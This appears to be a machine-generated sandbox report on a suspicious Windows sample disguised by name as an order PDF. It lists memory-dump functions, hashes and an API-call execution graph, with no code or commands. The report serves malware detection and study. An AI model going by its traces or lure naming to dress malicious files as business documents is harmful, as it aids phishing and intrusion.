                                                                                • Instruction ID: 41acfc6e1a6530beb1b5365e172e109b381e74766a87906d0da46b2494adc2b8
                                                                                • Opcode Fuzzy Hash: 90eef649251ba7195022a4405bf036aab8b0c499238e0a2700d5e372e140198d
                                                                                • Instruction Fuzzy Hash: 8CC09B3145C7846BE37157A4AC5FBD7BFDC5701704F54449BF09D104D297543015819F
                                                                                Function 00F20850 Relevance: .0, Instructions: 5COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9457b8e56d78a83468dc51aec62dbeb8f5798a6951821965d6df055ab532ebcb
                                                                                • Instruction ID: 20798eab933b805318c44d07003c224381b9ece5448d867c63469757c05a9596
                                                                                • Opcode Fuzzy Hash: 9457b8e56d78a83468dc51aec62dbeb8f5798a6951821965d6df055ab532ebcb
                                                                                • Instruction Fuzzy Hash: 1E90023204461C8B46402BD5B81D75D775CA544655B844052A50D415559B5574108595

                                                                                Non-executed Functions

                                                                                Function 00F2DE38 Relevance: 2.7, Strings: 2, Instructions: 170COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4']q$4']q
                                                                                • API String ID: 0-3120983240
                                                                                • Opcode ID: 6e683abcabe7b9166d3c7b7e00b2b23f08c77ff73c0cc2888c61718f9af03f16
                                                                                • Instruction ID: df47fb217d25ef158ef2eb454503c07077c02d081927ab0d973cb794f25f52d2
                                                                                • Opcode Fuzzy Hash: 6e683abcabe7b9166d3c7b7e00b2b23f08c77ff73c0cc2888c61718f9af03f16
                                                                                • Instruction Fuzzy Hash: E4713870E006099FD708EF6EE950A9ABBF3FF89300F14D469D5089B269EB346906DF41
                                                                                Function 00F2DE48 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4']q$4']q
                                                                                • API String ID: 0-3120983240
                                                                                • Opcode ID: 027f55828e111352e1604b09a0d278a559dbf659a1221d77cab8071bc315f074
                                                                                • Instruction ID: 7c5affb131b959b7e8f0ddd3ace650f38d7115e90c01b415df6583064f9cee7c
                                                                                • Opcode Fuzzy Hash: 027f55828e111352e1604b09a0d278a559dbf659a1221d77cab8071bc315f074
                                                                                • Instruction Fuzzy Hash: 94710770A006099FD708EF6EE950A9ABBF3FF89300F14D469D5089B269EB346906DF41
                                                                                Function 048DBCF3 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: S34w
                                                                                • API String ID: 0-2879009777
                                                                                • Opcode ID: 86cd2e5a9d4f4823303d94ca41c159dda848894bf63441901fd190295a7197f5
                                                                                • Instruction ID: ecd99f2cdb4bef80190d28d2e548b41c7b27cb94fa5bdcc88d8156cc2802c32c
                                                                                • Opcode Fuzzy Hash: 86cd2e5a9d4f4823303d94ca41c159dda848894bf63441901fd190295a7197f5
                                                                                • Instruction Fuzzy Hash: 9C512C74A00218CFD758EF68D854BAEB7B2FB8A304F1084A9E50EEB294DB359D41DF51
                                                                                Function 0489ECA8 Relevance: .2, Instructions: 220COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 124066bf58d1704213221309e4b2bb2e4e450a9f5f6166f245cc1b5fc9ec28d8
                                                                                • Instruction ID: 8b52c845efec19b034533cf39aaabbbb54ad9da2809a1428ddd63d5c8a1fe66c
                                                                                • Opcode Fuzzy Hash: 124066bf58d1704213221309e4b2bb2e4e450a9f5f6166f245cc1b5fc9ec28d8
                                                                                • Instruction Fuzzy Hash: 05913470E01608CFDB54DF68D488BADBBF2FB49304F1895AAE50AA7285EB706D45CF00
                                                                                Function 0489ECB8 Relevance: .2, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: da5b9823cb97cf79ad234e8c05a0c35c66c995f2677d4040134045f77c566c4a
                                                                                • Instruction ID: 8e4f21feee12385b4c70364acedcaee8387e658549ddfeff8569b03b47d1b1b8
                                                                                • Opcode Fuzzy Hash: da5b9823cb97cf79ad234e8c05a0c35c66c995f2677d4040134045f77c566c4a
                                                                                • Instruction Fuzzy Hash: AD910470A04618CFDB54DF68D488BADBBF2FB49304F1895AAD50AE7285EB746D45CF00
                                                                                Function 072DE9D0 Relevance: .2, Instructions: 203COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2255218343.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_72c0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 45c82a95315900ad323651b15a2837a8813b9ced74d4b9f6f9dcee0cfa27f253
                                                                                • Instruction ID: 32433c408c70ba8134952b21c1eef66a58be615859b15247c577d5325897992b
                                                                                • Opcode Fuzzy Hash: 45c82a95315900ad323651b15a2837a8813b9ced74d4b9f6f9dcee0cfa27f253
                                                                                • Instruction Fuzzy Hash: 318118B4D25219CFDB24DFA9C88479DBBF2BF4A300F1590A9D409AB251DBB45D86CF01
                                                                                Function 0489EE94 Relevance: .1, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3d9b06d736de0e2012301c6f5c6f454509a02f1f4078babeab6d703658e399c5
                                                                                • Instruction ID: 53a2df0fabeb5d81afab032b3f43b0089f789f78f2e525f45caacd46ce7dedb5
                                                                                • Opcode Fuzzy Hash: 3d9b06d736de0e2012301c6f5c6f454509a02f1f4078babeab6d703658e399c5
                                                                                • Instruction Fuzzy Hash: 2E41F274A01618CFDB54DFA8D4887ADBBF1FF49304F2881AAE909A7695E7306D81CF01
                                                                                Function 072C0040 Relevance: .1, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2255218343.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_72c0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5064baf9275eaa412be81112eefb243d16906944ae4bbb95c6ecbd1bfa73eb82
                                                                                • Instruction ID: 5384c2e8a6847534d271147f4debfe44dcd279f04155e54f0b465d4ac2c14728
                                                                                • Opcode Fuzzy Hash: 5064baf9275eaa412be81112eefb243d16906944ae4bbb95c6ecbd1bfa73eb82
                                                                                • Instruction Fuzzy Hash: 59310BB1D14629CFEB68CF2ACD58799F6F6AFC9301F10C0EA940CA6254EB704E859F51
                                                                                Function 0489A6F0 Relevance: .1, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d29077c22249b2a9dc79e888a2a7468d640e30bd7f01f49d9090be5f76dbb8d5
                                                                                • Instruction ID: 30a6448710852b3cf80e0577b3c1af6fa8eec1af9acda975418946f9982dfd38
                                                                                • Opcode Fuzzy Hash: d29077c22249b2a9dc79e888a2a7468d640e30bd7f01f49d9090be5f76dbb8d5
                                                                                • Instruction Fuzzy Hash: 2B31B770E046588FEB18CF6AC8447AEBBF6AF88304F14C5AA9409B7254EB745985CF50
                                                                                Function 04895088 Relevance: .1, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c7cacbfada3a8ee919f548913b286fc26b7aaae18e32173a340a73cf4b250eca
                                                                                • Instruction ID: 495841493a81574b8c395a7d3d81d7c3714aea706039add58457a25ac5876d38
                                                                                • Opcode Fuzzy Hash: c7cacbfada3a8ee919f548913b286fc26b7aaae18e32173a340a73cf4b250eca
                                                                                • Instruction Fuzzy Hash: 9921E7B2D01A18ABEB18CF9BDC4479DBBF2BFC8304F08C66AD408AA254DB7519458F50
                                                                                Function 04895098 Relevance: .1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aaa4da011924eee787fd9d6a5fa55d1c65fb01b18ef350a7fcd2965e781ca376
                                                                                • Instruction ID: cfe33d43f119dcda1cbb3155375ebaf49109b0cdaa22a9424473306dbac29ae0
                                                                                • Opcode Fuzzy Hash: aaa4da011924eee787fd9d6a5fa55d1c65fb01b18ef350a7fcd2965e781ca376
                                                                                • Instruction Fuzzy Hash: 8821A3B2E01618DBEB18CF9BD8447DDFAF6BFC8314F18C56AD408AA254DB7419458F50
                                                                                Function 072C003E Relevance: .1, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2255218343.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_72c0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1f2c034435d81a1f273e54ceb44e5e47cec280bb644ca8ea5c0c5434a4358b58
                                                                                • Instruction ID: dba1fab184bc25a1693891db4c278f1b9a64a8affa4b22222de3c7080f1ebbda
                                                                                • Opcode Fuzzy Hash: 1f2c034435d81a1f273e54ceb44e5e47cec280bb644ca8ea5c0c5434a4358b58
                                                                                • Instruction Fuzzy Hash: DB21E1B1D14A19CBEB28CF2B8C54789F6F7AFC4301F04C1FA940CA6254EB700A858F55
                                                                                Function 00F24555 Relevance: 6.3, Strings: 5, Instructions: 9COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: TJbq$TJbq$jjjjjj$$]q$$]q
                                                                                • API String ID: 0-480122481
                                                                                • Opcode ID: b0f95a97f37d30f97950ede02d3e5a89895e143eab9a59d03a18ec2aa977ed87
                                                                                • Instruction ID: a3bea4ca662b3038e0429683d97c9a6ca3714f2e8f92348e063986f98a10c195
                                                                                • Opcode Fuzzy Hash: b0f95a97f37d30f97950ede02d3e5a89895e143eab9a59d03a18ec2aa977ed87
                                                                                • Instruction Fuzzy Hash: 8DC08C0200E2A18F8B430B1810D12702F00AA62341328D491D0920A04BC1609982F221
                                                                                Function 00F245A7 Relevance: 5.0, Strings: 4, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: TJbq$jjjjjj$$]q$$]q
                                                                                • API String ID: 0-2713803779
                                                                                • Opcode ID: 498b25cbef05cc9d011bc6416a14232ee356b39c04e563043087a267527bf62e
                                                                                • Instruction ID: ab206864a38f2126a3c6fd35d1edbfbe2a626353ad629ca98bfb963460bd0a64
                                                                                • Opcode Fuzzy Hash: 498b25cbef05cc9d011bc6416a14232ee356b39c04e563043087a267527bf62e
                                                                                • Instruction Fuzzy Hash: ECB012F2C17740DFC3008E108184740FBE0BF50617F0BC099C5040E043933CC156C644

                                                                                Execution Graph

                                                                                Execution Coverage:9.2%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:433
                                                                                Total number of Limit Nodes:34
                                                                                execution_graph 25733 1806540 25734 1806586 25733->25734 25738 1806720 25734->25738 25741 1806713 25734->25741 25735 1806673 25745 180611c 25738->25745 25742 1806720 25741->25742 25743 180611c DuplicateHandle 25742->25743 25744 180674e 25743->25744 25744->25735 25746 1806788 DuplicateHandle 25745->25746 25747 180674e 25746->25747 25747->25735 25748 58599e0 25749 5859a01 25748->25749 25752 58593b0 25749->25752 25753 58593bb 25752->25753 25754 5859a64 25753->25754 25757 585b181 25753->25757 25763 585b190 25753->25763 25769 5859d1c 25757->25769 25760 585b1b7 25760->25754 25761 585b1e0 CreateIconFromResourceEx 25762 585b25e 25761->25762 25762->25754 25764 585b1aa 25763->25764 25765 5859d1c CreateIconFromResourceEx 25763->25765 25766 585b1b7 25764->25766 25767 585b1e0 CreateIconFromResourceEx 25764->25767 25765->25764 25766->25754 25768 585b25e 25767->25768 25768->25754 25770 585b1e0 CreateIconFromResourceEx 25769->25770 25771 585b1aa 25770->25771 25771->25760 25771->25761 26138 5858290 26139 58582bc 26138->26139 26140 58582a9 26138->26140 26153 58583f6 26139->26153 26169 5858a20 26139->26169 26141 58582f0 26140->26141 26142 58582ae 26140->26142 26141->26139 26145 585857c 26141->26145 26143 58582b3 26142->26143 26144 58582ca 26142->26144 26143->26139 26146 58584da 26143->26146 26144->26139 26149 5858544 26144->26149 26150 58584e8 26144->26150 26144->26153 26163 5857b28 26145->26163 26155 5857a78 26146->26155 26159 5857ae8 26149->26159 26151 5857a88 7 API calls 26150->26151 26151->26153 26156 5857a83 26155->26156 26157 5858a20 9 API calls 26156->26157 26158 5858c36 26156->26158 26157->26158 26158->26153 26160 5857af3 26159->26160 26161 5858a20 9 API calls 26160->26161 26162 585d134 26161->26162 26162->26153 26164 5857b33 26163->26164 26165 5857a88 7 API calls 26164->26165 26166 585c5a0 26165->26166 26167 5858a20 9 API calls 26166->26167 26168 585c5a9 26167->26168 26168->26153 26170 5858a32 26169->26170 26171 5858a2b 26169->26171 26174 5858a40 26170->26174 26171->26153 26172 5858a38 26172->26153 26175 5858a80 26174->26175 26176 5858a5e 26174->26176 26177 5853720 9 API calls 26175->26177 26179 5858a6c 26176->26179 26182 5853720 26176->26182 26181 5858a87 26177->26181 26179->26172 26180 5858aa8 26180->26172 26181->26172 26183 5853725 26182->26183 26184 5853edc 26183->26184 26187 58537b0 26183->26187 26190 58534cc 26184->26190 26186 58537bd 26186->26180 26187->26186 26194 5858ac0 26187->26194 26199 5858ab0 26187->26199 26191 58534d7 26190->26191 26192 585d1d0 26191->26192 26193 180c7d8 7 API calls 26191->26193 26192->26186 26193->26192 26196 5858ac5 26194->26196 26195 5858b29 26195->26186 26196->26195 26204 5854341 26196->26204 26208 5854350 26196->26208 26200 5858ac0 26199->26200 26201 5858b29 26200->26201 26202 5854341 CallWindowProcW 26200->26202 26203 5854350 CallWindowProcW 26200->26203 26201->26186 26202->26201 26203->26201 26205 585434a 26204->26205 26206 58543ea CallWindowProcW 26205->26206 26207 5854399 26205->26207 26206->26207 26207->26195 26209 5854355 26208->26209 26210 58543ea CallWindowProcW 26209->26210 26211 5854399 26209->26211 26210->26211 26211->26195 25772 5855ee3 25773 5855eec 25772->25773 25775 5855f0a 25772->25775 25773->25775 25778 5854630 25773->25778 25776 5854630 7 API calls 25775->25776 25777 5856043 25775->25777 25776->25777 25779 5854635 25778->25779 25780 585467d 25779->25780 25782 5857ce0 25779->25782 25780->25775 25786 5857d19 25782->25786 25784 5857e23 25805 5856fcc 25784->25805 25801 585701c 25786->25801 25787 5857e2d 25819 585702c 25787->25819 25791 5857e5c 25792 5857f3f 25791->25792 25793 5854630 7 API calls 25791->25793 25798 5857fa0 25792->25798 25837 180efc4 25792->25837 25795 5857ee5 25793->25795 25794 5857fb4 25795->25792 25830 5855a14 25795->25830 25841 585cfb8 25798->25841 25845 585cfa8 25798->25845 25802 5857027 25801->25802 25803 5854630 7 API calls 25802->25803 25804 58592d8 25802->25804 25803->25804 25804->25784 25811 5856fd7 25805->25811 25806 585985c 25814 5854630 7 API calls 25806->25814 25818 5859890 25806->25818 25807 5859842 25810 5855a14 7 API calls 25807->25810 25808 5859809 25808->25807 25809 5855a14 7 API calls 25808->25809 25812 5859834 25809->25812 25813 585984e 25810->25813 25811->25806 25811->25808 25811->25818 25849 585932c 25811->25849 25853 585933c 25812->25853 25816 585933c 7 API calls 25813->25816 25814->25818 25816->25806 25818->25787 25820 5857037 25819->25820 25821 5857e35 25820->25821 25822 5854630 7 API calls 25820->25822 25821->25791 25825 585703c 25821->25825 25823 585b60c 25822->25823 25863 5859d88 25823->25863 25827 5857047 25825->25827 25826 585bcd6 25826->25791 25827->25826 25828 5854630 7 API calls 25827->25828 25829 585bda6 25828->25829 25829->25791 25831 5855a1f 25830->25831 25832 585b4ce 25831->25832 25833 5854630 7 API calls 25831->25833 25832->25792 25834 585b528 25833->25834 25835 5859d60 SendMessageW 25834->25835 25836 585b539 25835->25836 25836->25792 25838 180efcf 25837->25838 25840 180f925 25838->25840 25873 180c7d8 25838->25873 25840->25798 25842 585cfc5 25841->25842 25843 585702c 7 API calls 25842->25843 25844 585cfcc 25843->25844 25844->25794 25846 585cfb8 25845->25846 25847 585702c 7 API calls 25846->25847 25848 585cfcc 25847->25848 25848->25794 25850 5859337 25849->25850 25859 5859d34 7 API calls 25850->25859 25852 585b37d 25852->25808 25854 5859347 25853->25854 25855 5854630 7 API calls 25854->25855 25856 585b528 25855->25856 25860 5859d60 25856->25860 25859->25852 25861 585b550 SendMessageW 25860->25861 25862 585b539 25861->25862 25862->25807 25864 5859d93 25863->25864 25867 5857a88 25864->25867 25866 585b6f4 25866->25821 25869 5857a93 25867->25869 25868 585bad7 25868->25866 25869->25868 25870 5854630 7 API calls 25869->25870 25871 585b8f4 25870->25871 25871->25868 25872 585702c 7 API calls 25871->25872 25872->25868 25874 180c7e3 25873->25874 25877 180f0b8 25874->25877 25876 180fdff 25876->25840 25880 180f0c3 25877->25880 25878 180ffa8 25878->25876 25879 180ff71 25885 585d2f0 25879->25885 25890 585d298 25879->25890 25895 585d288 25879->25895 25880->25878 25880->25879 25881 180f0b8 7 API calls 25880->25881 25881->25880 25887 585d2a5 25885->25887 25886 585d2e7 25886->25878 25887->25886 25900 585d5e0 25887->25900 25907 585d5f0 25887->25907 25892 585d29d 25890->25892 25891 585d2e7 25891->25878 25892->25891 25893 585d5e0 7 API calls 25892->25893 25894 585d5f0 7 API calls 25892->25894 25893->25891 25894->25891 25897 585d298 25895->25897 25896 585d2e7 25896->25878 25897->25896 25898 585d5e0 7 API calls 25897->25898 25899 585d5f0 7 API calls 25897->25899 25898->25896 25899->25896 25901 585d5f0 25900->25901 25913 5857527 25901->25913 25925 5857538 25901->25925 25902 585d608 25937 585cac4 25902->25937 25904 585d611 25904->25886 25911 5857527 7 API calls 25907->25911 25912 5857538 7 API calls 25907->25912 25908 585d608 25909 585cac4 7 API calls 25908->25909 25910 585d611 25909->25910 25910->25886 25911->25908 25912->25908 25918 5857538 25913->25918 25914 5857572 25914->25902 25915 58576b2 25920 5857685 25915->25920 25921 5854630 7 API calls 25915->25921 25916 585764f 25942 180e2c0 25916->25942 25918->25914 25918->25915 25918->25916 25920->25902 25922 5857757 25921->25922 25922->25920 25923 5856fcc 7 API calls 25922->25923 25923->25920 25928 585755e 25925->25928 25926 5857572 25926->25902 25927 585764f 25936 180e2c0 7 API calls 25927->25936 25928->25926 25928->25927 25931 58576b2 25928->25931 25929 585765d 25930 5857685 25929->25930 25932 5854630 7 API calls 25929->25932 25930->25902 25931->25930 25933 5854630 7 API calls 25931->25933 25932->25930 25934 5857757 25933->25934 25934->25930 25935 5856fcc 7 API calls 25934->25935 25935->25930 25936->25929 25939 585cacf 25937->25939 25938 585dab4 25938->25904 25939->25938 25955 585db27 25939->25955 25973 585db38 25939->25973 25943 180e2ee 25942->25943 25944 180e3bf 25943->25944 25948 180e42b 25943->25948 25949 5854630 6 API calls 25943->25949 25951 585461f 25943->25951 25945 180c7d8 6 API calls 25944->25945 25944->25948 25945->25948 25946 180e366 25947 180e3ba KiUserCallbackDispatcher 25946->25947 25947->25944 25949->25946 25952 5854630 25951->25952 25953 585467d 25952->25953 25954 5857ce0 7 API calls 25952->25954 25953->25946 25954->25953 25958 585db93 25955->25958 25956 585dbfc 25968 5854630 7 API calls 25956->25968 25971 585dcc9 25956->25971 25957 585dbcd 25957->25956 26004 585cd54 EnumThreadWindows 25957->26004 25958->25957 25961 5854630 7 API calls 25958->25961 25961->25957 25969 585dcb8 25968->25969 25991 585cd64 25969->25991 25995 585e710 25971->25995 25975 585db93 25973->25975 25974 585dbcd 25986 585dbfc 25974->25986 26005 585cd54 EnumThreadWindows 25974->26005 25975->25974 25979 5854630 7 API calls 25975->25979 25977 585dcc9 25990 585e710 7 API calls 25977->25990 25978 585dcdb 25980 585dce9 25978->25980 25981 5854630 7 API calls 25978->25981 25979->25974 25982 585dd07 25980->25982 26006 585cd54 EnumThreadWindows 25980->26006 25981->25980 25984 585dd15 25982->25984 25985 5854630 7 API calls 25982->25985 25984->25938 25985->25984 25986->25977 25987 5854630 7 API calls 25986->25987 25988 585dcb8 25987->25988 25989 585cd64 EnumThreadWindows 25988->25989 25989->25977 25990->25978 25992 585de20 EnumThreadWindows 25991->25992 25994 585dea0 25992->25994 25994->25971 25997 585e74d 25995->25997 25996 5854630 7 API calls 26000 585e7c1 25996->26000 25997->25996 25999 585e8c6 25997->25999 25998 585e8bb 26003 5857ce0 7 API calls 25998->26003 26000->25998 26000->25999 26001 585ea00 7 API calls 26000->26001 26002 585e9eb 7 API calls 26000->26002 26001->25998 26002->25998 26003->25999 26004->25956 26005->25986 26006->25982 26007 1804668 26008 1804676 26007->26008 26017 1806de1 26008->26017 26011 1804704 26026 5856b20 26011->26026 26030 5856af1 26011->26030 26035 5856b30 26011->26035 26012 180470c 26018 1806e05 26017->26018 26039 1806ee0 26018->26039 26043 1806ef0 26018->26043 26019 18046e9 26022 180421c 26019->26022 26023 1804227 26022->26023 26051 180851c 26023->26051 26025 1808806 26025->26011 26027 5856b30 26026->26027 26120 5855a80 26027->26120 26031 5856b39 26030->26031 26032 5856afa 26030->26032 26033 5855a80 7 API calls 26031->26033 26032->26012 26034 5856b62 26033->26034 26034->26012 26036 5856b35 26035->26036 26037 5855a80 7 API calls 26036->26037 26038 5856b62 26037->26038 26038->26012 26040 1806ee4 26039->26040 26041 1806ff4 26040->26041 26047 18063d4 26040->26047 26044 1806ef5 26043->26044 26045 1806ff4 26044->26045 26046 18063d4 CreateActCtxA 26044->26046 26045->26045 26046->26045 26048 1807370 CreateActCtxA 26047->26048 26050 1807433 26048->26050 26052 1808527 26051->26052 26055 180853c 26052->26055 26054 18088dd 26054->26025 26056 1808547 26055->26056 26059 180856c 26056->26059 26058 18089ba 26058->26054 26060 1808577 26059->26060 26063 180859c 26060->26063 26062 1808aad 26062->26058 26064 18085a7 26063->26064 26065 1809c30 26064->26065 26071 1809edb 26064->26071 26067 1809e8b 26065->26067 26076 180bed9 26065->26076 26066 1809ec9 26066->26062 26067->26066 26080 180df70 26067->26080 26072 1809e87 26071->26072 26074 1809ee2 26071->26074 26073 1809ec9 26072->26073 26075 180df70 8 API calls 26072->26075 26073->26065 26074->26065 26075->26073 26084 180bf00 26076->26084 26088 180bf10 26076->26088 26077 180beee 26077->26067 26081 180df91 26080->26081 26082 180dfb5 26081->26082 26097 180e120 26081->26097 26082->26066 26085 180bf04 26084->26085 26092 180bff7 26085->26092 26086 180bf1f 26086->26077 26089 180bf11 26088->26089 26091 180bff7 GetModuleHandleW 26089->26091 26090 180bf1f 26090->26077 26091->26090 26094 180c008 26092->26094 26093 180c03c 26093->26086 26094->26093 26095 180c240 GetModuleHandleW 26094->26095 26096 180c26d 26095->26096 26096->26086 26098 180e12d 26097->26098 26100 180e166 26098->26100 26101 180c784 26098->26101 26100->26082 26102 180c78f 26101->26102 26103 180e1d8 26102->26103 26105 180c7b8 26102->26105 26106 180c7c3 26105->26106 26107 180859c 8 API calls 26106->26107 26108 180e247 26107->26108 26114 180e2c0 7 API calls 26108->26114 26109 180e256 26115 180c7c8 26109->26115 26111 180e270 26112 180c7d8 7 API calls 26111->26112 26113 180e277 26112->26113 26113->26103 26114->26109 26116 180c7d3 26115->26116 26117 180efc4 7 API calls 26116->26117 26119 180f7f1 26116->26119 26118 180f7ec 26117->26118 26118->26111 26119->26111 26121 5855a8b 26120->26121 26124 5855abc 26121->26124 26123 5856c74 26125 5855ac7 26124->26125 26128 585718e 26125->26128 26129 58572e9 26125->26129 26130 5856d90 26125->26130 26126 5856d90 7 API calls 26126->26129 26128->26126 26128->26129 26129->26123 26131 5856d9b 26130->26131 26133 5857527 7 API calls 26131->26133 26134 5857538 7 API calls 26131->26134 26132 5857524 26132->26128 26133->26132 26134->26132 26135 585c3a8 26136 5854630 7 API calls 26135->26136 26137 585c3b8 26136->26137 26212 58544b8 26213 58544c8 26212->26213 26217 5858e19 26213->26217 26223 5858e28 26213->26223 26214 58544f1 26218 5858e29 26217->26218 26229 5855c38 26218->26229 26220 5858eb2 26243 5857bf0 26220->26243 26222 5858eb9 26222->26214 26224 5858e5d 26223->26224 26225 5855c38 7 API calls 26224->26225 26226 5858eb2 26225->26226 26227 5857bf0 7 API calls 26226->26227 26228 5858eb9 26227->26228 26228->26214 26231 5855c3d 26229->26231 26232 5855e9c 26231->26232 26236 5855cd0 26231->26236 26259 58554e4 7 API calls 26231->26259 26233 5854630 7 API calls 26232->26233 26234 5856043 26232->26234 26233->26234 26234->26220 26253 5855500 26236->26253 26237 5855dc5 26242 5854630 7 API calls 26237->26242 26238 5855d1d 26238->26237 26239 5854630 7 API calls 26238->26239 26240 5855d8f 26239->26240 26241 5854630 7 API calls 26240->26241 26241->26237 26242->26232 26244 5857bfb 26243->26244 26245 5859055 26244->26245 26246 585901d 26244->26246 26252 5859024 26244->26252 26248 58590a6 26245->26248 26249 585907a 26245->26249 26247 5854630 7 API calls 26246->26247 26247->26252 26251 5854630 7 API calls 26248->26251 26250 5854630 7 API calls 26249->26250 26250->26252 26251->26252 26252->26222 26254 585550b 26253->26254 26256 5854630 7 API calls 26254->26256 26257 58561d7 26254->26257 26258 5856199 26254->26258 26255 5854630 7 API calls 26255->26258 26256->26258 26257->26238 26258->26255 26258->26257 26259->26236 26260 585d0f8 